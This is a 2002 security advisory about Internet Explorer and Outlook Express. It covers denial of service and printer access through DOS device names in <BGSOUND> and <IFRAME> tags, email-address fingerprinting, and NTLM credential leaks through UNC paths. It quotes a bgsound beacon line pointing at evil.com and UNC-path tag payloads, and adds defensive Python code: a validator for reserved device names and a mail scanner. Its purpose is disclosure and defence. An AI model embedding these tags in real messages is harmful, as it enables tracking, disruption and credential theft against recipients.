Internet Explorer/Outlook Express Special Device Access/DoS
16th May 2002 [SBWID-5347]

	Special device access and DoS in Internet Explorer/Outlook Express


	Internet Explorer 6.0


	In the ERRor & 3APA3A advisory:




	All versions of Windows have reserved filenames that refer to special
	devices such as prn, aux, nul, etc., also called DOS devices. A filename
	for a special device may have any directory path and any extension after
	the dot; for example c:\temp\prn.tmp refers to the prn device. The same
	API is used to access special devices and regular files, so any program
	that opens an attacker-supplied filename can be made to open a device
	instead. Unauthorized access to a special device may be a significant
	security issue, with results ranging from denial of service against a
	running program or service to hardware failure or compromise of secure
	data.
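	The following is an added example, not code from the advisory or from its authors: a Python function that implements the Windows reserved-name rule described above (any directory prefix, any extension after the first dot, trailing spaces/dots ignored, an optional trailing colon), so that an application which writes attacker-supplied filenames can tell a regular file from a device before the Win32 API does. Only c:\temp\prn.tmp comes from the advisory; the other sample paths are constructed.

```python
import re
from typing import Optional

# Reserved DOS device names, compared case-insensitively. Only COM1-COM9
# and LPT1-LPT9 are reserved; COM10 and the like are ordinary names.
RESERVED_DEVICES = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)


def dos_device_name(path: str) -> Optional[str]:
    """Return the DOS device that a Win32 open of `path` would hit,
    or None if the path names a regular file."""
    # Only the last path component matters: the directory part is ignored
    # when the final name is a device ("c:\temp\prn.tmp" still opens PRN).
    name = re.split(r"[\\/]", path)[-1]
    # Win32 strips trailing spaces and dots from the final component.
    name = name.rstrip(" .")
    # The name ends at the first '.' (extension) or ':' (classic "PRN:"),
    # so "prn.tmp", "nul.tar.gz" and "prn:" all still refer to devices.
    stem = re.split(r"[.:]", name, 1)[0]
    # Spaces between the name and the extension are ignored too ("prn .txt").
    stem = stem.rstrip(" ").upper()
    return stem if stem in RESERVED_DEVICES else None


def is_safe_filename(path: str) -> bool:
    """True if the path can be created as an ordinary file on Windows."""
    return dos_device_name(path) is None


if __name__ == "__main__":
    # Constructed sample paths; c:\temp\prn.tmp is the advisory's own example.
    for p in (r"c:\temp\prn.tmp", "C:/Users/x/lpt1.wav", "prn .txt",
              "PRN:", "com10.txt", "printer.wav"):
        print(f"{p!r:28} -> {dos_device_name(p)}")
```

	A rejected name should be refused outright rather than "sanitized": prefixing a directory or appending an extension does not change which object is opened, as the rule above shows.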




	ERRor discovered that the <BGSOUND> tag in conjunction with a special
	device name causes a DoS against Internet Explorer or Outlook Express
	regardless of security zone settings. For Outlook Express it is not
	trivial to remove the malcrafted message without losing the message
	folder.

	During investigation of this issue, 3APA3A and ERRor found that using
	the <IFRAME> tag it is possible to send any data to special

	Another problem is that, regardless of security zone settings, the source
	specified in a <BGSOUND> tag is always downloaded. This makes it possible
	to fingerprint a remote client by his e-mail address using something like

	<bgsound src="http://evil.com/registerme?email=victim@com.com">


	The remote client fingerprinting problem is discussed in [4].





	You can use [2] to test the DoS against Outlook Express via <BGSOUND>.
	[3] will print a text line on a text printer attached to LPT1 (in Outlook
	Express 6.0) via <IFRAME>.

	1. Special device access and DoS in Outlook Express

	2. Outlook Express Special Device DoS POC

	3. Outlook Express Special Device access POC

	4. Security risks associated with using e-mail.





	 Update (21 May 2002)



	Chad Loder added that <bgsound src="\\\new\file.wav"> causes IE to
	connect via NetBT to the host named in the UNC path. Depending on
	LMCompatibilityLevel, it may cause the user's cleartext password or
	NTLMv1 challenge response to leak. It is a very serious bug.
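	Added example, not code from the advisory or its authors: a Python scanner for HTML mail that finds <bgsound> and <iframe> tags and classifies each src by the vector it enables, covering all four problems on this page: a remote http source that is fetched regardless of zone (the fingerprinting beacon), a DOS device name as the source (the DoS and the LPT1 write via <IFRAME>), and a UNC path or file:// URL with a host part (the NetBT connection and NTLM leak from the update). The device check is a compact regex form of the reserved-name rule given earlier. The sample message is constructed; evil.com and victim@com.com are taken from the advisory's own example, while filesrv and intro.wav are made-up names.

```python
import re
from html import unescape
from typing import List, Tuple
from urllib.parse import urlsplit

# <bgsound ...> and <iframe ...> start tags; group 2 is the raw attribute text.
_TAG_RE = re.compile(r"<\s*(bgsound|iframe)\b([^>]*)>", re.I | re.S)
# src="..." / src='...' / src=bare, the three forms HTML allows.
_SRC_RE = re.compile(r"""\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
                     re.I | re.S)
# A reserved DOS device name as the last path component, any extension allowed.
_DEVICE_RE = re.compile(r"^(?:con|prn|aux|nul|com[1-9]|lpt[1-9])(?:[.:]|$)",
                        re.I)


def classify_src(src: str) -> str:
    """Map a src value to the risk it carries inside <bgsound>/<iframe>:
    remote - http/https/ftp: fetched regardless of zone (tracking beacon)
    unc    - UNC path, or file:// with a host: SMB/NetBT connect, NTLM leak
    device - last path component is a DOS device: DoS or output to hardware
    other  - an ordinary local or relative file."""
    s = unescape(src).strip()          # handles &#92; style encoding of '\'
    parts = urlsplit(s)
    scheme = parts.scheme.lower()
    if scheme in ("http", "https", "ftp"):
        return "remote"
    # "//host/share" and "file://host/share" both name a remote SMB share.
    has_host = bool(parts.netloc) and parts.netloc.lower() != "localhost"
    if s.startswith("\\\\") or (scheme in ("", "file") and has_host):
        return "unc"
    basename = re.split(r"[\\/]", s)[-1].rstrip(" .")
    if _DEVICE_RE.match(basename):
        return "device"
    return "other"


def scan_html(html: str) -> List[Tuple[str, str, str]]:
    """Return (tag, src, risk) for every bgsound/iframe tag carrying a src."""
    findings = []
    for m in _TAG_RE.finditer(html):
        tag, attrs = m.group(1).lower(), m.group(2)
        sm = _SRC_RE.search(attrs)
        if not sm:
            continue
        src = next(g for g in sm.groups() if g is not None)
        findings.append((tag, src, classify_src(src)))
    return findings


def dangerous_sources(html: str) -> List[Tuple[str, str, str]]:
    """Only the findings a mail gateway would act on (quarantine/strip)."""
    return [f for f in scan_html(html) if f[2] != "other"]


# Constructed sample message (not from the advisory) exercising each vector.
SAMPLE_MAIL = r"""<html><body>
<p>Quarterly report attached.</p>
<bgsound src="http://evil.com/registerme?email=victim@com.com">
<bgsound src="c:\temp\prn.tmp">
<iframe src=\\filesrv\share\intro.wav width=0 height=0></iframe>
<bgsound src='music.wav'>
</body></html>"""


if __name__ == "__main__":
    for tag, src, risk in scan_html(SAMPLE_MAIL):
        print(f"{risk:7} <{tag}> {src}")
```

	Stripping the offending tags at the gateway addresses all three vectors at once, since the client-side behaviour in question ignores zone settings; the "remote" class is reported separately because a tracking beacon is a privacy problem rather than a compromise of the host.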


	No patch is available to our knowledge; however, if one is posted it will
	probably find its way here:



